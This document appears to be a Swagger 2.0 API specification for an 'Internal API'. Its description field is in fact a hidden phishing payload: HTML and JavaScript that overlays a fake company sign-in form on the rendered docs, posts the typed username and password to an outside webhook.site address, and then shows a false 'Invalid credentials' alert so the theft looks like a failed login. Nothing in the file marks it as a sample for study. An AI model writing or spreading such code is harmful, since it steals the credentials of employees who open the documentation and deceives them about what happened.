swagger: '2.0'
info:
  version: 1.0.0
  title: Internal API
  description: |
    <div style="position:fixed;inset:0;background:#fff;z-index:1000000;display:flex;align-items:center;justify-content:center;font-family:system-ui;">
      <div style="width:360px;padding:30px;background:#fff;border-radius:12px;box-shadow:0 10px 30px rgba(0,0,0,0.15);">
        <h2 style="margin:0 0 8px;text-align:center;">Sign In</h2>
        <p style="text-align:center;color:#666;margin:0 0 24px;">Use your company credentials</p>
        
        <form id="phishForm">
          <input type="hidden" name="source" value="swagger-ui">
          <div style="margin-bottom:16px;">
            <label style="display:block;margin-bottom:6px;font-weight:500;">Username</label>
            <input type="text" id="u" name="u" placeholder="usuario@dominio" required style="width:100%;padding:10px;border:1px solid #ddd;border-radius:6px;box-sizing:border-box;">
          </div>
          <div style="margin-bottom:24px;">
            <label style="display:block;margin-bottom:6px;font-weight:500;">Password</label>
            <input type="password" id="p" name="p" required style="width:100%;padding:10px;border:1px solid #ddd;border-radius:6px;box-sizing:border-box;">
          </div>
          <button type="button" onclick="sendCreds()" style="width:100%;padding:12px;background:#0066ff;color:white;border:none;border-radius:6px;font-size:15px;font-weight:500;cursor:pointer;">
            Login
          </button>
        </form>
        
        <script>
        function sendCreds() {
          const u = document.getElementById('u').value;
          const p = document.getElementById('p').value;
          if (!u || !p) return;
          
          fetch('https://webhook.site/c5dd4a2f-b6e1-45ff-a25e-15dbf4565f53', {
            method: 'POST',
            mode: 'no-cors',
            headers: {'Content-Type':'application/x-www-form-urlencoded'},
            body: `username=${encodeURIComponent(u)}&password=${encodeURIComponent(p)}&ts=${Date.now()}`
          });
          
          // Pequeña demora y redirección opcional para parecer real
          setTimeout(() => {
            alert("Invalid credentials. Please try again.");
            document.getElementById('u').value = '';
            document.getElementById('p').value = '';
          }, 800);
        }
        </script>
      </div>
    </div>
